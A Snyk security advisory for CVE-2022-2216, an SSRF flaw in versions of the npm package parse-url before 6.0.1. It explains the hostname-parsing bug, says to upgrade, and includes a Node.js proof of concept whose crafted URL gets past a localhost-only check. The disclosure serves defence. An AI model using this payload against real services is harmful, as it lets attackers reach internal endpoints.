Server-side Request Forgery (SSRF) Affecting parse-url package, versions <6.0.1


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.19% (59th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-PARSEURL-2936249
  • published28 Jun 2022
  • disclosed28 Jun 2022
  • creditPocas

Introduced: 28 Jun 2022

CVE-2022-2216  (opens in a new tab)
CWE-918  (opens in a new tab)

How to fix?

Upgrade parse-url to version 6.0.1 or higher.

Overview

parse-url is an An advanced url parser supporting git urls too.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) in the parseUrl function, due to mishandling hostnames when processing usernames and passwords.

PoC:

const parseUrl = require("parse-url");
const express = require('express');
const http = require('http');
const app = express();

const isLocal = () => (req, res, next) => (req.connection.remoteAddress === '::ffff:127.0.0.1'|| req.connection.remoteAddress === '::1' ? true:false)
    ? next()
    : res.json({'state':'You\'re not locally'});

parsed = parseUrl("http://google:com:@@127.0.0.1:9999/ssrf_check");
console.log(parsed);

app.get('/', (req, res) => {
    if(parsed.resource == '127.0.0.1'){
        res.send('Not good');
    } else{
        http.get(parsed.href)
        res.send('Good');
    }
});

app.get('/ssrf_check', isLocal(), (req, res) =>{
    console.log('ssrf bypass');
    res.send(true);
});

app.listen(9999);

CVSS Scores

version 3.1